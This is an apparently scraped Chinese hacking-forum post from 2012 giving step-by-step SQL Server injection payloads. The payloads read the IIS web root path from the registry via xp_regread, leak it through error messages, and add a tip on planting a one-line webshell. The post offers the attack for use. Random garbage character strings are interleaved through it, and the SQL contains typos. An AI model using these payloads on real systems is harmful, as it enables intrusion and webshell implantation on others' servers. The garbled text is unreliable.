中国网络渗透测试联盟

标题: DB权限暴出网站物理路径代码 [打印本页]
作者: admin    时间: 2012-9-15 14:23
标题: DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
0 \% g1 S1 \% y' {# E9 u  t7 o3 k! Y! S" w+ |! Y4 w* k0 B" v) s

) e+ }% L; o# r7 K# \7 O  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
  ?+ J4 Z/ Y2 \$ X" |- C
7 t: p) D* o9 W" K: J  {  e. q, r9 V4 E9 z. Z1 R
  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
7 F8 H# {" X2 A
1 L2 @. q, g4 B- R- G% p
5 V# s2 z7 ]* N9 D$ `2 W/ E) e* Q  4、drop table [jm_tmp]-- 删除此表。: j5 o/ H: w# d3 w( h

9 O" f0 A% `5 |7 `! X6 _' W' C: E3 o7 o
另附上备分专用一句话
; l. ~3 e8 F9 L8 x' {( a" m  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.8 ^4 P8 P  a! U* |




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2